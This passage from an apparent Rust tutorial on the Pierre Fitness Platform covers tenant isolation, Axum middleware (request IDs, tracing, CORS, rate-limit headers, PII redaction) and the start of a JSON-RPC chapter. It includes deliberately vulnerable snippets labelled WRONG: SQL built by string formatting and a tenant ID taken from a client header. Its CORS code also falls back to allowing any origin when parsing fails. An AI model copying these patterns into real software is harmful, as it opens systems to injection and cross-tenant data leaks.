- Response validation: Ensure returned data belongs to tenant
Principle: Even if one layer fails (e.g., application bug passes wrong tenant ID), the database filtering prevents cross-tenant leaks.
Preventing Common Vulnerabilities
SQL injection: All queries use parameterized statements (?1, $1) instead of string concatenation:
#![allow(unused)]
fn main() {
// CORRECT (parameterized)
sqlx::query("SELECT * FROM users WHERE tenant_id = ?1")
.bind(tenant_id)
.fetch_all(&pool)
.await?;
// WRONG (vulnerable to SQL injection)
let query = format!("SELECT * FROM users WHERE tenant_id = '{}'", tenant_id);
sqlx::query(&query).fetch_all(&pool).await?;
}
Insecure direct object references (IDOR): Always validate resource ownership:
#![allow(unused)]
fn main() {
// CORRECT
async fn get_activity(tenant_id: Uuid, user_id: Uuid, activity_id: &str) -> Result<Activity> {
let activity = database.get_activity(activity_id).await?;
// Verify activity belongs to this tenant
if activity.tenant_id != tenant_id {
return Err(AppError::not_found("Activity"));
}
Ok(activity)
}
}
Cross-tenant data leaks: Never trust client-provided tenant IDs. Always extract from authenticated user:
#![allow(unused)]
fn main() {
// CORRECT
let tenant_context = tenant_isolation.validate_tenant_access(&jwt_token).await?;
let activities = database.get_activities(tenant_context.tenant_id, user_id).await?;
// WRONG (client can forge tenant_id)
let tenant_id = request.headers.get("x-tenant-id")?;
let activities = database.get_activities(tenant_id, user_id).await?;
}
Key Takeaways
- True multi-tenancy: Multiple organizations share infrastructure with complete data isolation. Every database query filters by tenant_id.
- TenantContext lifecycle: Extract tenant from JWT → Look up user's tenant_id → Validate role → Pass context to handlers.
- Role-based access control: Four roles (Owner, Admin, Billing, Member) with explicit permission checks for sensitive operations.
- Database-level isolation: WHERE tenant_id = ? clauses in all queries provide defense in depth against application bugs.
- Tenant-scoped resources: TenantResources wrapper automatically includes tenant_id in all operations.
- OAuth credential isolation: Each tenant configures their own Strava/Garmin OAuth apps. No sharing of API credentials.
- Structured logging: All log entries include tenant_id for security audits, billing, and performance analysis.
- Type-state pattern: Rust's type system prevents passing wrong tenant IDs by encapsulating tenant_id in TenantResources.
- Fail-safe defaults: Unknown roles default to Member (least privilege). Unknown resource types deny access.
- Usage tracking: Per-tenant provider usage enables rate limiting, billing, and capacity planning.
Next Chapter: Chapter 08: Middleware & Request Context - Learn how the Pierre platform uses Axum middleware to extract authentication, tenant context, and rate limiting information from HTTP requests before routing to handlers.
Chapter 08: Middleware & Request Context
This chapter explores how the Pierre Fitness Platform uses Axum middleware to extract authentication, tenant context, rate limiting information, and tracing data from HTTP requests before routing to handlers. You’ll learn about middleware composition, request ID generation, CORS configuration, and PII-safe logging.
Middleware Stack Overview
The Pierre platform uses a layered middleware stack that processes every HTTP request before it reaches handlers:
┌────────────────────────────────────────────────────────────┐
│ HTTP Request │
└───────────────────────┬────────────────────────────────────┘
│
▼
┌──────────────────────────┐
│ CORS Middleware │ ← Allow cross-origin requests
│ (OPTIONS preflight) │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Request ID Middleware │ ← Generate UUID for tracing
│ x-request-id: ... │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tracing Middleware │ ← Create span with metadata
│ RequestContext │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Auth Middleware │ ← Validate JWT/API key
│ Extract user_id │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tenant Middleware │ ← Extract tenant context
│ TenantContext │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Rate Limit Middleware │ ← Check usage limits
│ Add X-RateLimit-* │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Route Handler │ ← Business logic
│ Process request │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Response │ ← Add security headers
│ x-request-id: ... │
└──────────────────────────┘
Source: src/middleware/mod.rs:1-77
#![allow(unused)]
fn main() {
// ABOUTME: HTTP middleware for request tracing, authentication, and context propagation
// ABOUTME: Provides request ID generation, span creation, and tenant context for structured logging
/// Authentication middleware for MCP and API requests
pub mod auth;
/// CORS middleware configuration
pub mod cors;
/// Rate limiting middleware and utilities
pub mod rate_limiting;
/// PII redaction and sensitive data masking
pub mod redaction;
/// Request ID generation and propagation
pub mod request_id;
/// Request tracing and context propagation
pub mod tracing;
// Authentication middleware
/// MCP authentication middleware
pub use auth::McpAuthMiddleware;
// CORS middleware
/// Setup CORS layer for HTTP endpoints
pub use cors::setup_cors;
// Rate limiting middleware and utilities
/// Check rate limit and send error response
pub use rate_limiting::check_rate_limit_and_respond;
/// Create rate limit error
pub use rate_limiting::create_rate_limit_error;
/// Create rate limit headers
pub use rate_limiting::create_rate_limit_headers;
/// Rate limit headers module
pub use rate_limiting::headers;
// PII-safe logging and redaction
/// Mask email addresses for logging
pub use redaction::mask_email;
/// Redact sensitive HTTP headers
pub use redaction::redact_headers;
/// Redact JSON fields by pattern
pub use redaction::redact_json_fields;
/// Redact token patterns from strings
pub use redaction::redact_token_patterns;
/// Bounded tenant label for tracing
pub use redaction::BoundedTenantLabel;
/// Bounded user label for tracing
pub use redaction::BoundedUserLabel;
/// Redaction configuration
pub use redaction::RedactionConfig;
/// Redaction features toggle
pub use redaction::RedactionFeatures;
// Request ID middleware
/// Request ID middleware function
pub use request_id::request_id_middleware;
/// Request ID extractor
pub use request_id::RequestId;
// Request tracing and context management
/// Create database operation span
pub use tracing::create_database_span;
/// Create MCP operation span
pub use tracing::create_mcp_span;
/// Create HTTP request span
pub use tracing::create_request_span;
/// Request context for tracing
pub use tracing::RequestContext;
}
Rust Idiom: Re-exporting with pub use
The middleware/mod.rs file acts as a facade, re-exporting commonly used types from submodules. This allows handlers to use crate::middleware::RequestId instead of use crate::middleware::request_id::RequestId, reducing coupling to internal module organization.
Request ID Generation
Every HTTP request receives a unique identifier for distributed tracing and log correlation:
Source: src/middleware/request_id.rs:39-61
#![allow(unused)]
fn main() {
/// Request ID middleware that generates and propagates correlation IDs
///
/// This middleware:
/// 1. Generates a unique UUID v4 for each request
/// 2. Adds the request ID to request extensions for handler access
/// 3. Records the request ID in the current tracing span
/// 4. Includes the request ID in the response header
pub async fn request_id_middleware(mut req: Request, next: Next) -> Response {
// Generate unique request ID
let request_id = Uuid::new_v4().to_string();
// Record request ID in current tracing span
let span = Span::current();
span.record("request_id", &request_id);
// Add to request extensions for handler access
req.extensions_mut().insert(RequestId(request_id.clone()));
// Process request
let mut response = next.run(req).await;
// Add request ID to response header
if let Ok(header_value) = HeaderValue::from_str(&request_id) {
response
.headers_mut()
.insert(REQUEST_ID_HEADER, header_value);
}
response
}
}
Flow:
- Generate: Create UUID v4 for globally unique ID
- Record: Add to current tracing span for structured logs
- Extend: Store in request extensions for handler access
- Process: Call next middleware/handler with next.run(req)
- Respond: Include x-request-id header in response
Rust Idiom: Request extensions for typed data
Axum’s req.extensions_mut().insert(RequestId(...)) provides type-safe request-scoped storage. Handlers can extract RequestId using:
#![allow(unused)]
fn main() {
async fn handler(Extension(request_id): Extension<RequestId>) -> String {
format!("Request ID: {}", request_id.0)
}
}
The type system ensures you can’t accidentally insert or extract the wrong type.
RequestId Extractor
Source: src/middleware/request_id.rs:75-90
#![allow(unused)]
fn main() {
/// Request ID extractor for use in handlers
///
/// This can be extracted in any Axum handler to access the request ID
/// generated by the middleware.
#[derive(Debug, Clone)]
pub struct RequestId(pub String);
impl RequestId {
/// Get the request ID as a string slice
#[must_use]
pub fn as_str(&self) -> &str {
&self.0
}
}
impl std::fmt::Display for RequestId {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "{}", self.0)
}
}
}
Newtype pattern: Wrapping String in RequestId provides:
- Type safety: Can’t confuse request ID with other strings
- Display trait: Use {request_id} in format strings
- Documentation: Self-documenting API (function signature says "I need a RequestId")
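The payoff shows up at call sites. This self-contained sketch pairs the RequestId newtype with a hypothetical log_line function (not a Pierre API) that can only accept a RequestId, never a bare String:

```rust
use std::fmt;

/// Newtype wrapper: a request ID is not interchangeable with other strings.
#[derive(Debug, Clone)]
pub struct RequestId(pub String);

impl RequestId {
    pub fn as_str(&self) -> &str {
        &self.0
    }
}

impl fmt::Display for RequestId {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        write!(f, "{}", self.0)
    }
}

// Passing a user ID or email here is a compile error, not a runtime bug:
// the signature demands a RequestId.
fn log_line(request_id: &RequestId, message: &str) -> String {
    format!("[{request_id}] {message}")
}

fn main() {
    let id = RequestId("req_abc123".to_owned());
    assert_eq!(log_line(&id, "processing"), "[req_abc123] processing");
}
```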
Request Context and Tracing
The RequestContext struct flows through the entire request lifecycle, accumulating metadata:
Source: src/middleware/tracing.rs:10-67
#![allow(unused)]
fn main() {
/// Request context that flows through the entire request lifecycle
#[derive(Debug, Clone)]
pub struct RequestContext {
/// Unique identifier for this request
pub request_id: String,
/// Authenticated user ID (if available)
pub user_id: Option<Uuid>,
/// Tenant ID for multi-tenancy (if available)
pub tenant_id: Option<Uuid>,
/// Authentication method used (e.g., "Bearer", "ApiKey")
pub auth_method: Option<String>,
}
impl RequestContext {
/// Create new request context with generated request ID
#[must_use]
pub fn new() -> Self {
Self {
request_id: format!("req_{}", Uuid::new_v4().simple()),
user_id: None,
tenant_id: None,
auth_method: None,
}
}
/// Update context with authentication information
#[must_use]
pub fn with_auth(mut self, user_id: Uuid, auth_method: String) -> Self {
self.user_id = Some(user_id);
self.tenant_id = Some(user_id); // For now, user_id serves as tenant_id
self.auth_method = Some(auth_method);
self
}
/// Record context in current tracing span
pub fn record_in_span(&self) {
let span = Span::current();
span.record("request_id", &self.request_id);
if let Some(user_id) = &self.user_id {
span.record("user_id", user_id.to_string());
}
if let Some(tenant_id) = &self.tenant_id {
span.record("tenant_id", tenant_id.to_string());
}
if let Some(auth_method) = &self.auth_method {
span.record("auth_method", auth_method);
}
}
}
}
Builder pattern: The with_auth method allows chaining:
#![allow(unused)]
fn main() {
let context = RequestContext::new()
.with_auth(user_id, "Bearer".into());
}
Span recording: The record_in_span method populates tracing fields declared as Empty:
#![allow(unused)]
fn main() {
let span = tracing::info_span!("request", user_id = tracing::field::Empty);
context.record_in_span(); // Now span has user_id field
}
Span Creation Utilities
The platform provides helpers for creating tracing spans with pre-configured fields:
Source: src/middleware/tracing.rs:69-110
#![allow(unused)]
fn main() {
/// Create a tracing span for HTTP requests
pub fn create_request_span(method: &str, path: &str) -> tracing::Span {
tracing::info_span!(
"http_request",
method = %method,
path = %path,
request_id = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
auth_method = tracing::field::Empty,
status_code = tracing::field::Empty,
duration_ms = tracing::field::Empty,
)
}
/// Create a tracing span for MCP operations
pub fn create_mcp_span(operation: &str) -> tracing::Span {
tracing::info_span!(
"mcp_operation",
operation = %operation,
request_id = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
tool_name = tracing::field::Empty,
duration_ms = tracing::field::Empty,
success = tracing::field::Empty,
)
}
/// Create a tracing span for database operations
pub fn create_database_span(operation: &str, table: &str) -> tracing::Span {
tracing::debug_span!(
"database_operation",
operation = %operation,
table = %table,
request_id = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
duration_ms = tracing::field::Empty,
rows_affected = tracing::field::Empty,
)
}
}
Usage pattern:
#![allow(unused)]
fn main() {
async fn handle_request() -> Result<Response> {
let span = create_request_span("POST", "/api/activities");
let _guard = span.enter();
// All logs within this scope include span fields
tracing::info!("Processing activity request");
// Later: record additional fields
Span::current().record("status_code", 200);
Span::current().record("duration_ms", 42);
Ok(response)
}
}
CORS Configuration
The platform configures Cross-Origin Resource Sharing (CORS) for web client access:
Source: src/middleware/cors.rs:40-96
#![allow(unused)]
fn main() {
/// Configure CORS settings for the MCP server
///
/// Configures cross-origin requests based on `CORS_ALLOWED_ORIGINS` environment variable.
/// Supports both wildcard ("*") for development and specific origin lists for production.
pub fn setup_cors(config: &crate::config::environment::ServerConfig) -> CorsLayer {
// Parse allowed origins from configuration
let allow_origin =
if config.cors.allowed_origins.is_empty() || config.cors.allowed_origins == "*" {
// Development mode: allow any origin
AllowOrigin::any()
} else {
// Production mode: parse comma-separated origin list
let origins: Vec<HeaderValue> = config
.cors
.allowed_origins
.split(',')
.filter_map(|s| {
let trimmed = s.trim();
if trimmed.is_empty() {
None
} else {
HeaderValue::from_str(trimmed).ok()
}
})
.collect();
if origins.is_empty() {
// Fallback to any if parsing failed
AllowOrigin::any()
} else {
AllowOrigin::list(origins)
}
};
CorsLayer::new()
.allow_origin(allow_origin)
.allow_headers([
HeaderName::from_static("content-type"),
HeaderName::from_static("authorization"),
HeaderName::from_static("x-requested-with"),
HeaderName::from_static("accept"),
HeaderName::from_static("origin"),
HeaderName::from_static("access-control-request-method"),
HeaderName::from_static("access-control-request-headers"),
HeaderName::from_static("x-strava-client-id"),
HeaderName::from_static("x-strava-client-secret"),
HeaderName::from_static("x-fitbit-client-id"),
HeaderName::from_static("x-fitbit-client-secret"),
HeaderName::from_static("x-pierre-api-key"),
HeaderName::from_static("x-tenant-name"),
HeaderName::from_static("x-tenant-id"),
])
.allow_methods([
Method::GET,
Method::POST,
Method::PUT,
Method::DELETE,
Method::OPTIONS,
Method::PATCH,
])
}
}
Configuration examples:
# Development: allow all origins
export CORS_ALLOWED_ORIGINS="*"
# Production: specific origins only
export CORS_ALLOWED_ORIGINS="https://app.pierre.fitness,https://admin.pierre.fitness"
Security: The platform allows custom headers for:
- Provider OAuth:
x-strava-client-id,x-fitbit-client-idfor dynamic OAuth configuration - Multi-tenancy:
x-tenant-name,x-tenant-idfor tenant routing - API keys:
x-pierre-api-keyfor alternative authentication
Rust Idiom: filter_map for parsing
The CORS configuration uses filter_map to parse origin strings while skipping invalid entries:
#![allow(unused)]
fn main() {
config.cors.allowed_origins
.split(',')
.filter_map(|s| {
let trimmed = s.trim();
if trimmed.is_empty() {
None // Skip empty strings
} else {
HeaderValue::from_str(trimmed).ok() // Parse or skip invalid
}
})
.collect();
}
This handles malformed configuration gracefully without panicking.
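The same idiom can be run without tower-http. In this sketch a scheme-prefix check stands in for HeaderValue::from_str validation, and parse_origins is an illustrative name, not the platform's function:

```rust
/// Parse a comma-separated origin list, skipping empty and invalid entries.
/// The real code validates with HeaderValue::from_str; a simple scheme
/// check stands in here so the example runs dependency-free.
fn parse_origins(raw: &str) -> Vec<String> {
    raw.split(',')
        .filter_map(|s| {
            let trimmed = s.trim();
            if trimmed.is_empty() {
                None // skip empty segments, e.g. "a,,b"
            } else if trimmed.starts_with("https://") || trimmed.starts_with("http://") {
                Some(trimmed.to_owned())
            } else {
                None // skip entries that aren't plausible origins
            }
        })
        .collect()
}

fn main() {
    let parsed =
        parse_origins("https://app.pierre.fitness, ,not-a-url,https://admin.pierre.fitness");
    assert_eq!(parsed, vec![
        "https://app.pierre.fitness".to_owned(),
        "https://admin.pierre.fitness".to_owned(),
    ]);
}
```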
Rate Limiting Headers
The platform adds standard HTTP rate limiting headers to all responses:
Source: src/middleware/rate_limiting.rs:17-32
#![allow(unused)]
fn main() {
/// HTTP header names for rate limiting
pub mod headers {
/// HTTP header name for maximum requests allowed in the current window
pub const X_RATE_LIMIT_LIMIT: &str = "X-RateLimit-Limit";
/// HTTP header name for remaining requests in the current window
pub const X_RATE_LIMIT_REMAINING: &str = "X-RateLimit-Remaining";
/// HTTP header name for Unix timestamp when rate limit resets
pub const X_RATE_LIMIT_RESET: &str = "X-RateLimit-Reset";
/// HTTP header name for rate limit window duration in seconds
pub const X_RATE_LIMIT_WINDOW: &str = "X-RateLimit-Window";
/// HTTP header name for rate limit tier information
pub const X_RATE_LIMIT_TIER: &str = "X-RateLimit-Tier";
/// HTTP header name for authentication method used
pub const X_RATE_LIMIT_AUTH_METHOD: &str = "X-RateLimit-AuthMethod";
/// HTTP header name for retry-after duration in seconds
pub const RETRY_AFTER: &str = "Retry-After";
}
}
Standard headers:
- X-RateLimit-Limit: Total requests allowed (e.g., "5000")
- X-RateLimit-Remaining: Requests left in window (e.g., "4832")
- X-RateLimit-Reset: Unix timestamp when limit resets (e.g., "1706054400")
- Retry-After: Seconds until reset for 429 responses (e.g., "3600")
Custom headers:
- X-RateLimit-Window: Duration in seconds (e.g., "2592000" for 30 days)
- X-RateLimit-Tier: User's subscription tier (e.g., "free", "premium")
- X-RateLimit-AuthMethod: Authentication type (e.g., "JwtToken", "ApiKey")
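The Retry-After value is derived from the reset timestamp and clamped at zero, so a reset time already in the past never produces a negative header. A minimal sketch of that arithmetic on Unix timestamps (retry_after_secs is an illustrative name):

```rust
/// Seconds a client should wait before retrying, clamped at zero so a
/// reset timestamp already in the past never yields a negative Retry-After.
fn retry_after_secs(reset_at_unix: i64, now_unix: i64) -> i64 {
    (reset_at_unix - now_unix).max(0)
}

fn main() {
    // Reset one hour in the future: tell the client to wait 3600 seconds.
    assert_eq!(retry_after_secs(1_706_054_400, 1_706_050_800), 3_600);
    // Reset already passed: clamp to zero rather than going negative.
    assert_eq!(retry_after_secs(1_706_050_800, 1_706_054_400), 0);
}
```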
Creating Rate Limit Headers
Source: src/middleware/rate_limiting.rs:34-82
#![allow(unused)]
fn main() {
/// Create a `HeaderMap` with rate limit headers
#[must_use]
pub fn create_rate_limit_headers(rate_limit_info: &UnifiedRateLimitInfo) -> HeaderMap {
let mut headers = HeaderMap::new();
// Add rate limit headers if we have the information
if let Some(limit) = rate_limit_info.limit {
if let Ok(header_value) = HeaderValue::from_str(&limit.to_string()) {
headers.insert(headers::X_RATE_LIMIT_LIMIT, header_value);
}
}
if let Some(remaining) = rate_limit_info.remaining {
if let Ok(header_value) = HeaderValue::from_str(&remaining.to_string()) {
headers.insert(headers::X_RATE_LIMIT_REMAINING, header_value);
}
}
if let Some(reset_at) = rate_limit_info.reset_at {
// Add reset timestamp as Unix epoch
let reset_timestamp = reset_at.timestamp();
if let Ok(header_value) = HeaderValue::from_str(&reset_timestamp.to_string()) {
headers.insert(headers::X_RATE_LIMIT_RESET, header_value);
}
// Add Retry-After header (seconds until reset)
let retry_after = (reset_at - chrono::Utc::now()).num_seconds().max(0);
if let Ok(header_value) = HeaderValue::from_str(&retry_after.to_string()) {
headers.insert(headers::RETRY_AFTER, header_value);
}
}
// Add tier and authentication method information
if let Ok(header_value) = HeaderValue::from_str(&rate_limit_info.tier) {
headers.insert(headers::X_RATE_LIMIT_TIER, header_value);
}
if let Ok(header_value) = HeaderValue::from_str(&rate_limit_info.auth_method) {
headers.insert(headers::X_RATE_LIMIT_AUTH_METHOD, header_value);
}
// Add rate limit window (always 30 days for monthly limits)
headers.insert(
headers::X_RATE_LIMIT_WINDOW,
HeaderValue::from_static("2592000"), // 30 days in seconds
);
headers
}
}
Error handling: All header insertions use if let Ok(...) to gracefully handle invalid header values. If conversion fails, the header is skipped rather than panicking.
Rust Idiom: HeaderValue::from_static
The X_RATE_LIMIT_WINDOW uses from_static for compile-time constant strings, avoiding runtime allocation. For dynamic values, use HeaderValue::from_str which validates UTF-8 and HTTP header constraints.
Rate Limit Error Responses
Source: src/middleware/rate_limiting.rs:84-111
#![allow(unused)]
fn main() {
/// Create a rate limit exceeded error response with proper headers
#[must_use]
pub fn create_rate_limit_error(rate_limit_info: &UnifiedRateLimitInfo) -> AppError {
let limit = rate_limit_info.limit.unwrap_or(0);
AppError::new(
ErrorCode::RateLimitExceeded,
format!(
"Rate limit exceeded. You have reached your limit of {} requests for the {} tier",
limit, rate_limit_info.tier
),
)
}
/// Helper function to check rate limits and return appropriate response
///
/// # Errors
///
/// Returns an error if the rate limit has been exceeded
pub fn check_rate_limit_and_respond(
rate_limit_info: &UnifiedRateLimitInfo,
) -> Result<(), AppError> {
if rate_limit_info.is_rate_limited {
Err(create_rate_limit_error(rate_limit_info))
} else {
Ok(())
}
}
}
Usage in handlers:
#![allow(unused)]
fn main() {
async fn api_handler(auth: AuthResult) -> Result<Json<Response>> {
// Check rate limit first
check_rate_limit_and_respond(&auth.rate_limit)?;
// Process request
let data = fetch_data().await?;
Ok(Json(Response { data }))
}
}
PII Redaction and Data Protection
The platform redacts Personally Identifiable Information (PII) from logs to comply with GDPR, CCPA, and other privacy regulations:
Source: src/middleware/redaction.rs:38-95
#![allow(unused)]
fn main() {
bitflags! {
/// Redaction feature flags to control which types of data to redact
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct RedactionFeatures: u8 {
/// Redact HTTP headers (Authorization, Cookie, etc.)
const HEADERS = 0b0001;
/// Redact JSON body fields (client_secret, tokens, etc.)
const BODY_FIELDS = 0b0010;
/// Mask email addresses
const EMAILS = 0b0100;
/// Enable all redaction features
const ALL = Self::HEADERS.bits() | Self::BODY_FIELDS.bits() | Self::EMAILS.bits();
}
}
/// Configuration for PII redaction
#[derive(Debug, Clone)]
pub struct RedactionConfig {
/// Enable redaction globally (default: true in production, false in dev)
pub enabled: bool,
/// Which redaction features to enable
pub features: RedactionFeatures,
/// Replacement string for redacted sensitive data
pub redaction_placeholder: String,
}
impl Default for RedactionConfig {
fn default() -> Self {
Self {
enabled: true,
features: RedactionFeatures::ALL,
redaction_placeholder: "[REDACTED]".to_owned(),
}
}
}
impl RedactionConfig {
/// Create redaction config from environment
#[must_use]
pub fn from_env() -> Self {
let config = crate::constants::get_server_config();
let enabled = config.is_none_or(|c| c.logging.redact_pii);
let features = if enabled {
RedactionFeatures::ALL
} else {
RedactionFeatures::empty()
};
Self {
enabled,
features,
redaction_placeholder: config.map_or_else(
|| "[REDACTED]".to_owned(),
|c| c.logging.redaction_placeholder.clone(),
),
}
}
/// Check if redaction is disabled
#[must_use]
pub const fn is_disabled(&self) -> bool {
!self.enabled
}
}
}
Bitflags pattern: Using the bitflags! macro allows fine-grained control:
#![allow(unused)]
fn main() {
// Enable only header and email redaction, skip body fields
let features = RedactionFeatures::HEADERS | RedactionFeatures::EMAILS;
// Check if headers should be redacted
if features.contains(RedactionFeatures::HEADERS) {
redact_authorization_header();
}
}
Configuration:
# Disable PII redaction in development
export REDACT_PII=false
# Customize redaction placeholder
export REDACTION_PLACEHOLDER="***"
Sensitive Headers
The platform redacts sensitive HTTP headers before logging:
- Authorization: JWT tokens and API keys
- Cookie: Session cookies
- X-API-Key: Alternative API key header
- X-Strava-Client-Secret: Provider OAuth secrets
- X-Fitbit-Client-Secret: Provider OAuth secrets
Email Masking
Email addresses are masked to prevent PII leakage:
#![allow(unused)]
fn main() {
mask_email("john.doe@example.com")
// Returns: "j***@e***.com"
}
This preserves enough information for debugging (first letter and domain) while protecting user identity.
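The exact masking rules live in src/middleware/redaction.rs; the sketch below is an assumed reimplementation that reproduces the example output (keep the first letter of the local part and of the domain, preserve the top-level domain):

```rust
/// Mask an email to "first-letter***@first-letter***.tld" form.
/// Sketch only: the real mask_email may handle edge cases
/// (unicode, subdomains, missing '@') differently.
fn mask_email(email: &str) -> String {
    let Some((local, domain)) = email.split_once('@') else {
        // Not an email shape: redact entirely rather than leak it.
        return "[REDACTED]".to_owned();
    };
    let local_initial = local.chars().next().unwrap_or('*');
    // Keep the top-level domain, mask the rest of the domain.
    let (host, tld) = domain.rsplit_once('.').unwrap_or((domain, ""));
    let host_initial = host.chars().next().unwrap_or('*');
    if tld.is_empty() {
        format!("{local_initial}***@{host_initial}***")
    } else {
        format!("{local_initial}***@{host_initial}***.{tld}")
    }
}

fn main() {
    assert_eq!(mask_email("john.doe@example.com"), "j***@e***.com");
    assert_eq!(mask_email("not-an-email"), "[REDACTED]");
}
```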
Middleware Ordering
Middleware order matters! The platform applies middleware in this sequence:
#![allow(unused)]
fn main() {
let app = Router::new()
    .route("/api/activities", get(get_activities))
    .layer(
        tower::ServiceBuilder::new()
            // 1. CORS (outermost: must handle OPTIONS preflight first)
            .layer(setup_cors(&config))
            // 2. Request ID (early for correlation)
            .layer(middleware::from_fn(request_id_middleware))
            // 3. Tracing (after request ID, before auth)
            .layer(TraceLayer::new_for_http())
            // 4. Authentication (extract user_id)
            .layer(Extension(Arc::new(auth_middleware)))
            // 5. Tenant isolation (requires user_id)
            .layer(Extension(Arc::new(tenant_isolation)))
            // 6. Rate limiting (requires auth context)
            .layer(Extension(Arc::new(rate_limiter))),
    );
}
Ordering rules:
- CORS first: Must handle OPTIONS preflight before other middleware
- Request ID early: Needed for all subsequent logs
- Tracing after ID: Span can include request ID immediately
- Auth before tenant: Need user_id to look up tenant
- Tenant before rate limit: Rate limits may be per-tenant
- Handlers last: Process after all middleware
Rust Idiom: Tower layer ordering
Axum middleware is built on Tower's Layer trait. With chained Router::layer calls, each new .layer() wraps everything added before it, so the last layer added becomes the outermost middleware and runs first. Wrapping the layers in a tower::ServiceBuilder reverses this: the first listed layer is outermost. Either way, the goal is a stack that processes requests as:
CORS(RequestID(Tracing(Auth(Handler))))
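The onion-style wrapping can be modeled with plain closures. This is a toy model of the composition order, not Tower's actual Service and Layer traits:

```rust
// A "handler" in miniature: a function from request to response string.
type Handler = Box<dyn Fn(&str) -> String>;

/// A "layer" in miniature: wraps an inner handler and tags the call order.
fn layer(name: &'static str, inner: Handler) -> Handler {
    Box::new(move |req| format!("{name}({})", inner(req)))
}

fn main() {
    let handler: Handler = Box::new(|req| format!("handle({req})"));
    // Wrapping innermost-first: the last wrap applied is the outermost layer,
    // so it sees the request first.
    let app = layer("cors", layer("request_id", layer("auth", handler)));
    assert_eq!(app("GET /"), "cors(request_id(auth(handle(GET /))))");
}
```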
Security Headers
The platform adds security headers to all responses:
- X-Request-ID: Request correlation ID
- X-Content-Type-Options: nosniff (prevent MIME sniffing)
- X-Frame-Options: DENY (prevent clickjacking)
- Strict-Transport-Security: Force HTTPS (production only)
- Content-Security-Policy: Restrict resource loading
Example: Adding security headers in middleware:
#![allow(unused)]
fn main() {
pub async fn security_headers_middleware(req: Request, next: Next) -> Response {
let mut response = next.run(req).await;
let headers = response.headers_mut();
headers.insert(
HeaderName::from_static("x-content-type-options"),
HeaderValue::from_static("nosniff"),
);
headers.insert(
HeaderName::from_static("x-frame-options"),
HeaderValue::from_static("DENY"),
);
if is_production() {
headers.insert(
HeaderName::from_static("strict-transport-security"),
HeaderValue::from_static("max-age=31536000; includeSubDomains"),
);
}
response
}
}
Key Takeaways
- Middleware stack: Layered architecture processes requests through CORS, request ID, tracing, auth, tenant isolation, and rate limiting before reaching handlers.
- Request ID: Every request gets a UUID v4 for distributed tracing. Included in response headers and all log entries.
- Request context: RequestContext flows through the request lifecycle, accumulating user_id, tenant_id, and auth_method for structured logging.
- CORS configuration: Environment-driven origin allowlist supports development (*) and production (specific domains). Custom headers for provider OAuth and multi-tenancy.
- Rate limit headers: Standard X-RateLimit-* headers inform clients about usage limits. Retry-After tells clients when to retry after 429 responses.
- PII redaction: Configurable redaction of authorization headers, email addresses, and sensitive JSON fields protects user privacy in logs.
- Middleware ordering: CORS → Request ID → Tracing → Auth → Tenant → Rate Limit → Handler. Order matters for dependencies.
- Span creation: Helper functions (create_request_span, create_mcp_span, create_database_span) provide consistent tracing across the platform.
- Type-safe extensions: Axum's extension system allows storing typed data (RequestId, RequestContext) in requests for handler access.
- Security headers: Platform adds X-Content-Type-Options, X-Frame-Options, and Strict-Transport-Security to prevent common web vulnerabilities.
End of Part II: Authentication & Security
You’ve completed the authentication and security section of the Pierre platform tutorial. You now understand:
- Error handling with structured errors (Chapter 2)
- Configuration management (Chapter 3)
- Dependency injection with Arc (Chapter 4)
- Cryptographic key management (Chapter 5)
- JWT authentication with RS256 (Chapter 6)
- Multi-tenant database isolation (Chapter 7)
- Middleware and request context (Chapter 8)
Next Chapter: Chapter 09: JSON-RPC 2.0 Foundation - Begin Part III by learning how the Model Context Protocol (MCP) builds on JSON-RPC 2.0 for structured client-server communication.
Chapter 09: JSON-RPC 2.0 Foundation
JSON-RPC 2.0 Overview
JSON-RPC is a lightweight remote procedure call (RPC) protocol encoded in JSON. It’s stateless, transport-agnostic, and simple to implement.
Key characteristics:
- Stateless: Each request is independent (no session state)
- Transport-agnostic: Works over HTTP, WebSocket, stdin/stdout, SSE
- Bidirectional: Both client and server can initiate requests
- Simple: Only 4 message types (request, response, error, notification)
Protocol Structure
┌──────────────────────────────────────────────────────────┐
│ JSON-RPC 2.0 │
│ │
│ Client Server │
│ │ │ │
│ │ ─────── Request ──────► │ │
│ │ { │ │
│ │ "jsonrpc": "2.0", │ │
│ │ "method": "tools/call", │ │
│ │ "params": {...}, │ │
│ │ "id": 1 │ │
│ │ } │ │
│ │ │ │
│ │ ◄──── Response ──────── │ │
│ │ { │ │
│ │ "jsonrpc": "2.0", │ │
│ │ "result": {...}, │ │
│ │ "id": 1 │ │
│ │ } │ │
│ │ │ │
│ │ ─────── Notification ───► │ │
│ │ { │ │
│ │ "jsonrpc": "2.0", │ │
│ │ "method": "progress", │ │
│ │ "params": {...} │ │
│ │ (no id field) │ │
│ │ } │ │
└──────────────────────────────────────────────────────────┘
Source: src/jsonrpc/mod.rs:1-44
#![allow(unused)]
fn main() {
// ABOUTME: Unified JSON-RPC 2.0 implementation for all protocols (MCP, A2A)
// ABOUTME: Provides shared request, response, and error types eliminating duplication
//! # JSON-RPC 2.0 Foundation
//!
//! This module provides a unified implementation of JSON-RPC 2.0 used by
//! all protocols in Pierre (MCP, A2A). This eliminates duplication and
//! ensures consistent behavior across protocols.
//!
//! ## Design Goals
//!
//! 1. **Single Source of Truth**: One JSON-RPC implementation
//! 2. **Protocol Agnostic**: Works for MCP, A2A, and future protocols
//! 3. **Type Safe**: Strong typing with serde support
//! 4. **Extensible**: Metadata field for protocol-specific extensions
/// JSON-RPC 2.0 version string
pub const JSONRPC_VERSION: &str = "2.0";
}
Note: Pierre uses a unified JSON-RPC implementation shared by MCP and A2A protocols. This ensures consistent behavior across all protocol handlers.
Request Structure
A JSON-RPC request represents a method call from client to server or server to client:
